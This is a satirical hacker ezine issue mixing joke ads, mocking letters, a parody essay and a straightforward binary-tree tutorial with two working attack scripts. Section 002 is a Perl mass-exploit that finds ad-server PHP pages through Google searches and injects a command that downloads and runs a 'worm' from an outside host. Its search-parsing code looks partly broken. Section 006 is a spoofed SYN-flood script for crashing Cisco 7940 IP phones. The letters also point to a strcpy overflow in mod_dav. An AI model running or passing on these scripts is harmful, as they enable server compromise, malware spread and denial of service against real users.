*** CDEJ COMMEMORATIVE HAQR KIT SPECIAL OFFER *** The first 50 readers of CDEJ who can come up with $2999.99 will receive a limited edition CDEJ haqr kit! This kit includes everything you need to be well on your way to haqing computer machines. Included in the kit is: -- A pair of roller blades! -- DOS 3.3 on 5.25" floppies! -- A book of k0dez and shell accounts! -- A wide veriety of hair dyes! (blue, green, and more!) -- Access to rotor's botnet! -- Haqr dictionary, including special catch-phrase section! Catch phrases include: "Yo man you zero cool? MAN I THOUGHT YOU WAS BLAQ!" ************* LIMITED TIME ONLY! **************** l'elephant avec les trunks huge izzue quatre HAPPY NEW YEAR TO YOU ALL ___ __ / \____ / \ / / __ \ \ / | Oo | \ \___/| |\___/\ | |_| |_| \ | |/|__|\| \ | |__| |\ | |__| |_/ / \ | @ | | @ || @ | ' | |~~| || | -J. Elephant- 'ooo' 'ooo''ooo' "CDEJ - leading all haqrs into 2006" :D?:D?:D?:D?:D?:D?:D?:D?:D?:D?:D?:D?:D?:D?:D?:D?:D?:D?:D *=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=** * *WAREZ AND MORE WAREZ* * *=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=** :D?:D?:D?:D?:D?:D?:D?:D?:D?:D?:D?:D?:D?:D?:D?:D?:D?:D?:D "y0h man yer trans? DOOD I THOUGHT YOU WAS BLAQ!" -- the_sniff "If this doesn't work, I'll try luring them with candy!" -- emmanuel goldstein "If this doesn't work, I'll just force them." -- Capt. Crunch **=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.** *our newest member: tip - "b4b0 sux i want to join cdej" * *best excuse: "I can't remember if I haq'd the FBI yer * * honor." -- trans * * * *MONTHLY ASCII: *= USA flag! * * * *=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=**.** * 000 -- Introduction (kinghaqr) * . 001 -- Fanmail (various lunatics) . * 002 -- St00pid K0dez (n0k14) * . 003 -- Binary Trees (anonymous) . * 004 -- Logo 0day (trans) * . 005 -- Be Famous (red box chili pepper) . * 006 -- cisco IP phone 7940 DoS(kokanin) . 007 -- :? * 010 -- Next Issue (monkey longarms) * . . *=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=**.** ----------------------------< 000 -- INTRODUCTION >---------------------------- king haqr Run the following text through the KDE 'Star Wars' screen saver, and whistle or play on your MP3 player the opening theme for 'Star Wars'. If you do not have the KDE 'Star Wars' screen saver, upgrade your KDE. k.thx CDEJ IV Return of the Haqr It was a dark time for the rebellion. Many phrack and b4b0 type haqrs thought that Obi-Wan-Longarms, Luke w01f-haqr, and Trans-Solo were fedz; that they were actually working for the empire. These kids, having reached their 20s in physical age but their minds being still somewhere around 13, actually believed that in a world of terrorism, war, and US/China information arms race, that fedz had time to join #phrack and #b4b0 and look for these moronic LoD wanna-be's. It was sad enough that they never grew up, but becoming paranoid and attributing way too much focus onto their lame way of life just made things worse. What's more, some of the inhabitants of the paranoid schizophrenic galaxy had been believing this way for years, hanging out in #2600 and other lame places, trying desperately to justify their lives by convincing themselves that they are super-intelligent computer haqrs. They went from the 'normal' 2600 phase (occurs in most lives around age 13, to fill the void sesame street left) to a terribly abnormal phase (up to mid twenties, or in the case of certain pedophiles, into retirement). We join our heros as the epic struggle between haqr and idiot continues..... * * * WE ONLY PUBLISH WHAT IS SENT IN BY EMAIL. STOP SAYING THAT WE RIPPED YER STUFF OFF, CAUSE YOU MUST HAVE SENT IT IN WHILE HAMMERED. STOP BEFORE WE HAQ YER POWERMAQ ----------------------------< 001 -- fanmail >---------------------------- various lunatics :D?:D?:D?:D?:D?:D?:D?:D?:D?:D?:D?:D?:D?:D?:D?:D?:D? Dear CDEJ: http://httpd.apache.org/docs/2.0/mod/mod_dav.html http://www.webdav.org http://www.webdav.org/mod_dav/ The Mod_Dav.c does not check for buffer overflows when copying to destination. Line Number: 1745 Actual Line: strcpy(s, elts[i].key); This module provides class 1 and class 2 WebDAV ('Web-based Distributed Authoring and Versioning') functionality for Apache. This extension to the HTTP protocol allows creating, moving, copying, and deleting resources and collections on a remote web server we gotta find out what uses it.. how its used.. what's calling that strcpy, etc.. if you do all the research for me; I'll write it setup a test box and before you compile mod_dav put a printf("Got here\n"); before the strcpy and play around with it until you get that printf this could be benefitial cause it uses "Remote databasing" remote databasing usually would mean private data such as CC#s etc.. http://httpd.apache.org/docs/2.0/mod/mod_dav.html http://www.webdav.org http://www.webdav.org/mod_dav/ - Some l4m3r :?:?:?:?:?:?:?:?:?:?:?:?:?:?:?:?:? Dear Some l4m3r: Thanks for the offer, but in the future, it would probably be best to just not waste your time. Chances are that any bug you discover in any software was already discovered or anticipated by cdej members, years ago. Nice try, though. F for eFfort. :D?:D?:D?:D?:D?:D?:D?:D?:D?:D?:D?:D?:D?:D?:D?:D?:D? Dear CDEJ: I am representing one [NAME WITHHELD BY STAFF] who is fileing suit against you and your organization for reproducing, without permission, a technical article. This technical article, entitled [NAME WITHHELD BY STAFF] is the sole property of my client, and reproducing this article without permission violates numerous intellectual property laws. Please contact us as soon as possible so that we can arrange a compromise on the issue, as my client wishes to resolve this matter as quickly as possible. - The Law Offices of C.H. Babour and T.T. Regaro :?:?:?:?:?:?:?:?:?:?:?:?:?:?:?:?:? Dear The Law Offices of C.H. Babour and T.T. Regaro: Thanks for your interest in CDEJ advertising literature! A helpful advertising campaign packet has been sent to your place of residence or employment free of charge. Should you choose to pursue advertising options with CDEJ and CDEJ ezine, contact a sales representative (sales@cdej.org) to learn about our wide array of promotional items for the workspace, including stress balls, memo pads, pens, and pocket protectors. Thanks! PS: Longarms lives in Africa. w01f lives in Lebannon. Trans hasn't had a home in years. Good luck with the lawsuit. :D?:D?:D?:D?:D?:D?:D?:D?:D?:D?:D?:D?:D?:D?:D?:D?:D? -------------< 002 -- stupid perl that might exploit something >------------- Anonymous #!/usr/bin/perl -w use LWP::UserAgent; $brws = new LWP::UserAgent; $brws->agent("Internet Explorer 6.0"); %h = (); $cmd="cd /tmp;wget www.corestorm.com/worm;mv worm bash;./bash"; @yayarray = ("inurl:adimage.php", "inurl:adimage.php \"de\"", "inurl:adimage.php \"ru\"", "inurl:adimage.php \"fr\"", "inurl:adimage.php \"fi\"", "inurl:adimage.php \"pl\"", "inurl:adframe.php", "inurl:adframe.php \"de\"", "inurl:adframe.php \"ru\"", "inurl:adframe.php \"fr\"", "inurl:adframe.php \"fi\"", "inurl:adframe.php \"pl\"", "inurl:adjs.php", "inurl:adjs.php \"de\"", "inurl:adjs.php \"ru\"", "inurl:adjs.php \"fr\"", "inurl:adjs.php \"fi\"", "inurl:adjs.php \"pl\"", "inurl:adclick.php", "inurl:adclick.php \"de\"", "inurl:adclick.php \"ru\"", "inurl:adclick.php \"fr\"", "inurl:adclick.php \"fi\"", "inurl:adclick.php \"pl\""); foreach $line (@yayarray) { open(F, "lynx -dump \"http://www.google.com\/search?hl=us&lr=&q=$line\"|") || die "$!"; open(F, "google.sucks") || die "$!"; if($line =~ /^.*\:(.*?.php).*/) { $php = "$1"; } while() { if(/cache|search/) { next; } if(/^.*?\d+.*?(http:\/\/.*?)\/$php.*/) { $h{$1}++; } } } foreach $line (sort keys %h) { print "Found host: $line. Exploiting...\n"; &exp($line); } sub exp($host) { local($host) = @_; if ( !$host ) { die("$!: Did not receive \$host."); } while ( $host ) { $data = "foo.bar1111','')); system('$cmd'); die;/*"; $send = new HTTP::Request POST => $host; $send->content($data); $gots = $brws->request($send); $show = $gots->content; if ( $show =~ /([\d]{1,10})<\/b>
(.*)/is ) { print $2 . "\n"; } else { print "$show\n"; } } } ----------------------------< 003 -- binary trees >---------------------------- anonymous (binary trees dedicated to monkey longarms) The binary tree is a fundamental data structure used in computer science. The binary tree is a useful data structure for rapidly storing sorted data and rapidly retrieving stored data. A binary tree is composed of parent nodes, or leaves, each of which stores data and also links to up to two other child nodes (leaves) which can be visualized spatially as below the first node with one placed to the left and with one placed to the right. It is the relationship between the leaves linked to and the linking leaf, also known as the parent node, which makes the binary tree such an efficient data structure. It is the leaf on the left which has a lesser key value (ie, the value used to search for a leaf in the tree), and it is the leaf on the right which has an equal or greater key value. As a result, the leaves on the farthest left of the tree have the lowest values, whereas the leaves on the right of the tree have the greatest values. More importantly, as each leaf connects to two other leaves, it is the beginning of a new, smaller, binary tree. Due to this nature, it is possible to easily access and insert data in a binary tree using search and insert functions recursively called on successive leaves. The typical graphical representation of a binary tree is essentially that of an upside down tree. It begins with a root node, which contains the original key value. The root node has two child nodes; each child node might have its own child nodes. Ideally, the tree would be structured so that it is a perfectly balanced tree, with each node having the same number of child nodes to its left and to its right. A perfectly balanced tree allows for the fastest average insertion of data or retrieval of data. The worst case scenario is a tree in which each node only has one child node, so it becomes as if it were a linked list in terms of speed. The typical representation of a binary tree looks like the following: 10 / \ 6 14 / \ / \ 5 8 11 18 The node storing the 10, represented here merely as 10, is the root node, linking to the left and right child nodes, with the left node storing a lower value than the parent node, and the node on the right storing a greater value than the parent node. Notice that if one removed the root node and the right child nodes, that the node storing the value 6 would be the equivalent a new, smaller, binary tree. The structure of a binary tree makes the insertion and search functions simple to implement using recursion. In fact, the two insertion and search functions are also both very similar. To insert data into a binary tree involves a function searching for an unused node in the proper position in the tree in which to insert the key value. The insert function is generally a recursive function that continues moving down the levels of a binary tree until there is an unused leaf in a position which follows the rules of placing nodes. The rules are that a lower value should be to the left of the node, and a greater or equal value should be to the right. Following the rules, an insert function should check each node to see if it is empty, if so, it would insert the data to be stored along with the key value (in most implementations, an empty node will simply be a NULL pointer from a parent node, so the function would also have to create the node). If the node is filled already, the insert function should check to see if the key value to be inserted is less than the key value of the current node, and if so, the insert function should be recursively called on the left child node, or if the key value to be inserted is greater than or equal to the key value of the current node the insert function should be recursively called on the right child node. The search function works along a similar fashion. It should check to see if the key value of the current node is the value to be searched. If not, it should check to see if the value to be searched for is less than the value of the node, in which case it should be recursively called on the left child node, or if it is greater than the value of the node, it should be recursively called on the right child node. Of course, it is also necessary to check to ensure that the left or right child node actually exists before calling the function on the node. Because binary trees have log (base 2) n layers, the average search time for a binary tree is log (base 2) n. To fill an entire binary tree, sorted, takes roughly log (base 2) n * n. Lets take a look at the necessary code for a simple implementation of a binary tree. First, it is necessary to have a struct, or class, defined as a node. struct node { int key_value; node *left; node *right; }; The struct has the ability to store the key_value and contains the two child nodes which define the node as part of a tree. In fact, the node itself is very similar to the node in a linked list. A basic knowledge of the code for a linked list will be very helpful in understanding the techniques of binary trees. Essentially, pointers are necessary to allow the arbitrary creation of new nodes in the tree. It is most logical to create a binary tree class to encapsulate the workings of the tree into a single area, and also making it reusable. The class will contain functions to insert data into the tree and to search for data. Due to the use of pointers, it will be necessary to include a function to delete the tree in order to conserve memory after the program has finished. class btree { node *root; btree(); ~btree(); void destroy_tree(node *leaf); void insert(int key, node *leaf); node *search(int key, node *leaf); public: void insert(int key); node *search(int key); void destroy_tree(); }; The insert and search functions that are public members of the class are designed to allow the user of the class to use the class without dealing with the underlying design. The insert and search functions which will be called recursively are the ones which contain two parameters, allowing them to travel down the tree. The destroy_tree function without arguments is a front for the destroy_tree function which will recursively destroy the tree, node by node, from the bottom up. The code for the class would look similar to the following: btree::btree() { root=NULL; } It is necessary to initialize root to NULL for the later functions to be able to recognize that it does not exist. btree::~btree() { destroy_tree(); } The destroy_tree function will set off the recursive function destroy_tree shown below which will actually delete all nodes of the tree. void destroy_tree(node *leaf) { if(leaf!=NULL) { destroy_tree(leaf->left); destroy_tree(leaf->right); delete leaf; } } The function destroy_tree goes to the bottom of each part of the tree, that is, searching while there is a non-null node, deletes that leaf, and then it works its way back up. The function deletes the leftmost node, then the right child node from the leftmost node's parent node, then it deletes the parent node, then works its way back to deleting the other child node of the parent of the node it just deleted, and it continues this deletion working its way up to the node of the tree upon which delete_tree was originally called. In the example tree above, the order of deletion of nodes would be 5 8 6 11 18 14 10. Note that it is necessary to delete all the child nodes to avoid wasting memory. void btree::insert(int key, node *leaf) { if(key< leaf->key_value) { if(leaf->left!=NULL) insert(key, leaf->left); else { leaf->left=new node; leaf->left->key_value=key; leaf->left->left=NULL; //Sets the left child of the child node to null leaf->left->right=NULL; //Sets the right child of the child node to null } } else if(key>=leaf->key_value) { if(leaf->right!=NULL) insert(key, leaf->right); else { leaf->right=new node; leaf->right->key_value=key; leaf->right->left=NULL; //Sets the left child of the child node to null leaf->right->right=NULL; //Sets the right child of the child node to null } } } The case where the root node is still NULL will be taken care of by the insert function that is nonrecursive and available to non-members of the class. The insert function searches, moving down the tree of children nodes, following the prescribed rules, left for a lower value to be inserted and right for a greater value, until it finds an empty node which it creates using the 'new' keyword and initializes with the key value while setting the new node's child node pointers to NULL. After creating the new node, the insert function will no longer call itself. node *btree::search(int key, node *leaf) { if(leaf!=NULL) { if(key==leaf->key_value) return leaf; if(keykey_value) return search(key, leaf->left); else return search(key, leaf->right); } else return NULL; } The search function shown above recursively moves down the tree until it either reaches a node with a key value equal to the value for which the function is searching or until the function reaches an uninitialized node, meaning that the value being searched for is not stored in the binary tree. It returns a pointer to the node to the previous instance of the function which called it, handing the pointer back up to the search function accessible outside the class. void btree::insert(int key) { if(root!=NULL) insert(key, root); else { root=new node; root->key_value=key; root->left=NULL; root->right=NULL; } } The public version of the insert function takes care of the case where the root has not been initialized by allocating the memory for it and setting both child nodes to NULL and setting the key_value to the value to be inserted. If the root node already exists, insert is called with the root node as the initial node of the function, and the recursive insert function takes over. node *btree::search(int key) { return search(key, root); } The public version of the search function is used to set off the search recursion at the root node, keeping it from being necessary for the user to have access to the root node. void btree::destroy_tree() { destroy_tree(root); } The public version of the destroy tree function is merely used to initialize the recursive destroy_tree function which then deletes all the nodes of the tree. ----------------------------< 004 -- logo 0day >---------------------------- trans Here is some Logo 0day. USE AT YOUR OWN RISK! # l0g0.logo # trans (trans@cobol-coders-club.com) # fractal buffer overflow offset pattern generator # k0dez from cdej/#efnet a = 1 go 20,20 print "Hello I am a turtle" repeat 10 [ repeat a [ forward 10 + a turnleft 12 + a ] repeat a [ forward 20 + a turnleft 12 + a ] a = a + a ] ----------------------------< 005 -- be famous! >---------------------------- red box chili pepper [ ED. NOTE: The venerable haqr of (NOTE: find out what he ever haqd and put here) has returned and is as fresh as ever! After convincing thousands of kids to ruin their lives and to needlessly annoy others, even into his mid twenties, he took a short hiatus to attempt a family. This having failed, he is back with new material for all the haqr community! ] Ok so you want to be famous? Well there are various techniques which include: The "Phrack" Technique: In this technique, you simply stand on the shoulders of other people. Pretend that the people who wrote about sequential breaking of 3 digit codes and blowing things up were brilliant, then reproduce a few lines of trash from yer favorite book, and yer all set! The "2600" Technique: Lonely? Dateless? Born decades after the hippy generation? That's ok, take advantage of America's youth! Bennefits include a mansion in New York, endless praise from teenage kids with tons of angst, and heavy denial! The "Securityfocus" Technique: Don't fit in anywhere else? Take a cheesy picture of yourself and send it in to securityfocus.com, along with some cheesy filth (trick them by saying it's a 'technical article'.) Works best if you nelgect to write about anything original. The "PLA" Technique: This one is my favorite. First, stop taking any and all hyperactivity / depression medicine your mom forces down your throat. Then, play pranks on everyone and include some fuzzy phone jargon to appear like you're haqing! Fun and easy. The "FightClub" Technique: Dangerous, but popular with today's youth. Named for the favorite movie of everyone who likes the technique. First, come up with some stupid political principles, and share them with like-minded individuals. Then, pretend to haq for the cause! Be creative! The cause can range from anything from anti-whitehat, to free tibet! Careful, participants have a high suicide rate! The "Local Hero" Technique: A good technique for the man who has little time. After your job at Burger King, show up at a 2600 meeting. Talk to the other 'local heros', carefully shunning any younger people. If someone actually ever asks you anything technical, make something up... ie. "Didn't you read the article I wrote in LODTJ2 about this?" Conclusion: The good thing about these techniques is that none of them require any actual technial skill! Instead of wasting your time studying and carefully avoding college, you can spend this precious time coloring your hair, riding a motorcycle, and telling everyone you see how elite you are! TILL NEXT TIME!!! ----------------------------< 006 >---------------------------- #!/usr/bin/perl # This is made for trashing cisco 7940 ip phones. kokanin made/discovered this. # A packetcount of 1000 and a packetdelay of 0.002 sent to port 80 makes my # phone reboot - play with the settings and stuff. PRIVATE PRIVATE PRIVATE!!! # not private anymore. Vulnerable phones are running ver. 7.0(2.0) using the skinny # protocol - this is not for the SIP firmware. use Net::RawIP; use Time::HiRes; $pkt = new Net::RawIP; die "Usage $0 " unless ($ARGV[4]); $pkt->set({ ip => { saddr => $ARGV[0], daddr => $ARGV[1] }, tcp=> { dest => $ARGV[2], syn => 1, seq => 0, ack => 0} }); for(1..$ARGV[3]){ $pkt->set({tcp=>{source=>int(rand(65535))}});Time::HiRes::sleep($ARGV[4]); $pkt->send; }; ----------------------------< 007 -- >---------------------------- CDEJ STAFF ----------------------------< 010 -- next issue >---------------------------- monkey longarms COMING IN NEXT ISSUE: "My New Mainifesto: Why I Hate Working at McDonalds" -- The Mentor "News from County Jail" -- Chrak "You Can Say Whatever You Want About Me, I Still Have Billions of Dollars." -- Bill Gates "Why isn't anyone hire me? I'm famous, for pete's sake!" -- Kevin Mitnick